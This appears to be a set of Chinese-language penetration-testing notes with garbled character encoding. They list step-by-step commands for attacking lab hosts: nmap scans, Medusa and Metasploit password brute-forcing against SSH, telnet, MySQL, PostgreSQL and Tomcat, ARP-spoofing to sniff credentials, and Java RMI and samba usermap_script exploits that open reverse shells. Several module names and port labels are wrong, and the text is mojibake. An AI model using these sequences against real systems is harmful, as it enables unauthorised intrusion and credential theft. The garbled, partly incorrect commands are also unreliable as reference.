```bash
1.web應(yīng)用漏洞掃描
1).Owasp-zap(掃描漏洞)
2).nikto(漏洞掃描)
nikto +host +"destip"
3).sqlmap(sql注入)
2.TCP漏洞利用
1).使用Nmap進(jìn)行端口掃描
nmap -p 21 "destip"
2).使用nc進(jìn)行ftp鏈接
nc “destip”
3.TCP密碼暴力破解
1).medusa
? Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
4.TCP用戶名明文密碼嗅探
1).arpspoof(對(duì)正在進(jìn)行TCP鏈接的兩臺(tái)機(jī)器進(jìn)行ARP嗅探)
arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
2).wireshark(對(duì)兩臺(tái)正在進(jìn)行TCP鏈接的兩臺(tái)及其進(jìn)行數(shù)據(jù)監(jiān)控進(jìn)而獲取用戶名和密碼)
5.ssh環(huán)境搭建
6.ssh-Banner信息的獲取
1).nmap
nmap -sV -p 22 + “destip”
2).metaspolit
? 2.1).msfconsole以終端的形式啟動(dòng)metaspolit
? 2.2).use auxiliary/scanner/ssh/ssh_version
? 2.3).set rhosts 192.168.37.142
? 2.4).run
3).nc +"destip" +"端口號(hào)"
7.通過修改配置文件,可以使別人無法獲取ubuntu的版本信息
1).sudo gedit sshd_config
2).重啟服務(wù)
```
```c
1.ssh弱口令破解
1).medusa
Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M mod
2).metasploit
? 2.1).msfconsole
? 2.2).使用use auxiliary/scanner/ssh/ssh_login
? 2.3).set rhosts 192.168.37.142
? 2.4).set username lzs
? 2.5).set password 123456
? 2.6).run
3).通過metasploit獲取meterpreter shell
2.ssh漏洞防護(hù)
1).修改sshd_config(ctrl+f 搜索port修改ssh的端口)
sudo gedit /etc/sshd_config
3.telnet信息獲取
1).使用namp對(duì)telnet進(jìn)行版本獲取
nmap -p 23 -sV 192.168.37.142
2).使用metasploit進(jìn)行版本獲取
2.1).msfconsole
2.2).use auxiliary/scanner/telnet/telnet_version
2.3).set rhost 192.168.37.142
2.4).run
4.telnet暴力密碼破解
1).使用metasploit進(jìn)行破解
? 1.1).msgconsole
? 1.2).use auxiliary/scanner/telnet/telnet_login
? 1.3).show options查看需要設(shè)置的參數(shù)
? 1.4).set user + 用戶名 --設(shè)置用戶名
? 1.5).set pass_file + 目標(biāo)文件 --設(shè)置用戶字典
? 1.6).set threads 10 設(shè)置線程數(shù)
? 1.7).run 運(yùn)行
5.rmi漏洞
1).使用nmap進(jìn)行端口掃描
? nmap -p 1099 -sV 192.168.1.9
2).使用metasploit進(jìn)行漏洞攻擊
? 2.1).msfconsole
? 2.2).use exploit/multi/misc/java_rmi_server
? 2.3).set rhost
? 2.4).set payload java/meterpreter/reverse_tcp
? 2.5).exploit
6.后門漏洞
1).使用nmap進(jìn)行端口掃描
nmap -p 1524 -sV 192.168.1.9
2).使用nc進(jìn)行鏈接
nc 192.168.1.9 1524
7.nfs漏洞
1).使用nmap端口掃描
nmap -p 2049 192.168.37.142
2).如果nfs配置不當(dāng),對(duì)方能對(duì)本機(jī)上的所有文件進(jìn)行操作
```
```cpp
1.rpcbind信息泄漏
1).nmap對(duì)111端口掃描獲取信息
nmap -p 111 -sV 192.168.37.142
2).nmap腳本對(duì)111進(jìn)行腳本探測
nmap -p 111 --script=rpcinfo 192.168.37.142
3).metasploit進(jìn)行端口掃描
3.1).msfconsole
3.2).use auxiliary/scanner/misc/sunrpc_portmapper
3.3).set rhost
3.4).run
2.samba RCE遠(yuǎn)程命令執(zhí)行漏洞利用(111端口漏洞)
1).metasploit
1.1).msfconsole
1.2).use exploit/multi/samba/usermap_script
1.3).set rhost
1.4).set payload cmd/unix/reverse
1.5).exploit(獲取shell)
3.rlogin最高權(quán)限登錄(需要目標(biāo)開放512,513端口)
1).使用namp對(duì)512,513端口進(jìn)行掃描
2).rlogin登錄
rlogin -l root 192.168.37.142
1.proftp測試
1.1).namp進(jìn)行端口掃描
nmap -p 2121 -sV 192.168.37.140
1.2).msf密碼破解
1).使用matesploit進(jìn)行破解
2.mysql弱口令破解
1.1).nmap進(jìn)行端口掃描
nmap -p 3306 -sV 192.168.37.140
1.2).msf進(jìn)行密碼破解
? 1.2.1).msfconsole
? 1.2.2).use auxiliary/scanner/mysql/mysql_login(使用這個(gè)模塊進(jìn)行破解)
? 1.2.3).設(shè)置模塊的參數(shù),跟以往的參數(shù)設(shè)置類似(可用show options進(jìn)行參數(shù)的查看)
1.3).通過mysql進(jìn)行登錄
? mysql -h 192.168.37.140 -u root
1.4).操作mysql的數(shù)據(jù)
3.postgresql數(shù)據(jù)庫密碼破解
1.1).nmap進(jìn)行端口掃描
nmap -p 5432 -sV 192.168.37.140
1.2).msf進(jìn)行暴力破解
? 1.2.1).msfconsole
? 1.2.2).use auxiliary/scanner/postgres/postgres_login使用這個(gè)模塊進(jìn)行破解)
? 1.2.3).設(shè)置模塊的參數(shù),跟以往的參數(shù)設(shè)置類似(可用show options進(jìn)行參數(shù)的查看)
1.3).使用msf獲取shell
? 1.3.1).msfconsole
? 1.3.2).use exploit/linux/postgres/postgres_payload 使用這個(gè)模塊進(jìn)行破解)
? 1.3.3).設(shè)置模塊的參數(shù),跟以往的參數(shù)設(shè)置類似(可用show options進(jìn)行參數(shù)的查看)
? 1.3.4).exploit
4.vnc密碼破解
searchsploit vnc進(jìn)行版本漏洞查詢
同上面端口漏洞操作步驟?。?!
5.irc密碼破解
searchsploit irc進(jìn)行版本漏洞查詢
同上面端口漏洞操作步驟?。。?/p>
6.tomcat密碼破解
1.1).nmap進(jìn)行端口掃描
nmap -p 8180 -sV 192.168.37.140
1.2).msf進(jìn)行暴力破解
? 1.2.1).msfconsole
? 1.2.2).use auxiliary/scanner/http/tomcat_mgr_login 使用這個(gè)模塊進(jìn)行破解)
? 1.2.3).設(shè)置模塊的參數(shù),跟以往的參數(shù)設(shè)置類似(可用show options進(jìn)行參數(shù)的查看)
1.3).使用msf獲取shell
? 1.3.1).msfconsole
? 1.3.2).use exploit/linux/postgres/tomcat_mgr_deploy 使用這個(gè)模塊進(jìn)行破解)
? 1.3.3).設(shè)置模塊的參數(shù),跟以往的參數(shù)設(shè)置類似(可用show options進(jìn)行參數(shù)的查看)
? 1.3.4).exploit
7.redis密碼破解
原理同上
```